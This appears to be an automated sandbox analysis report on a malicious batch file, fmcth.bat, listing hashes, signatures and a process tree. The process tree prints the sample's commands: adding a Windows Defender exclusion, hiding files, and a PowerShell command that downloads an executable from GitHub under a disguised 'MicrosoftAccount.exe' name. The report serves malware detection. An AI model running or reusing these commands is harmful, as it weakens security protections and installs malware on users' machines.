Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    18-01-2025 19:37

General

  • Target

    fmcth.bat

  • Size

    77KB

  • MD5

    468184814f843ccabfba6e4797b64dea

  • SHA1

    da23c44c7143e01c6084fd99f680926b553c3ba1

  • SHA256

    96cc09ef13054fe37778f15fa87202e727832895f9712f68a18618fcb5c24ef1

  • SHA512

    3c6cc618f4ecff6a46814fa7e1132ef06bbc306b58b692e25b355401fff6fec3cc6a5472d3376f39cefb23d9d85cd3d0138360d69a957c84884b4e79578ef541

  • SSDEEP

    1536:1ueBx7KjbtTZiK77VvRFf0bc7OMYIUuH4Rx+GwnPNm8ywUp5QjSdDmjnFllQZEqV:1uAx7KjbtTZiK77VvRFf0bc7OMYIUuH2

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\fmcth.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -window hidden -command ""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
    • C:\Windows\system32\cacls.exe
      "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      2⤵
        PID:2552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2840
      • C:\Windows\system32\attrib.exe
        attrib +h "MicrosoftAccount" /s /d
        2⤵
        • Views/modifies file attributes
        PID:2564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://github.com/SchoolSigmaBoy/SchoolSigma/raw/main/SigmaBoy.exe' -OutFile MicrosoftAccount.exe"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2732
      • C:\Windows\system32\attrib.exe
        attrib +h "C:\ProgramData\Microsoft\Settings\Accounts\MicrosoftAccount.exe" /s /d
        2⤵
        • Views/modifies file attributes
        PID:1920

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      1629ee93b8b82bc88deae63489efb3ea

      SHA1

      8c722525ac32c9ebf6ddc43fefaf97aebe041ae7

      SHA256

      e48b6706870977c6aef755c1a5aec32922459fbb6b7a694fd33d8f97a94f7261

      SHA512

      53c463abdb5ccd5d8443d86e3d8b86567155ff4591e0a53169e2d65013c470460ec96e22f84f1a3f466f597dd11df022a1f354829c37ca9ed1276bbc108e6219

    • memory/2720-4-0x000007FEF598E000-0x000007FEF598F000-memory.dmp

      Filesize

      4KB

    • memory/2720-7-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2720-6-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/2720-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

      Filesize

      2.9MB

    • memory/2720-8-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2720-9-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2720-10-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2720-11-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2720-12-0x000007FEF56D0000-0x000007FEF606D000-memory.dmp

      Filesize

      9.6MB

    • memory/2840-19-0x0000000002080000-0x0000000002088000-memory.dmp

      Filesize

      32KB

    • memory/2840-18-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

      Filesize

      2.9MB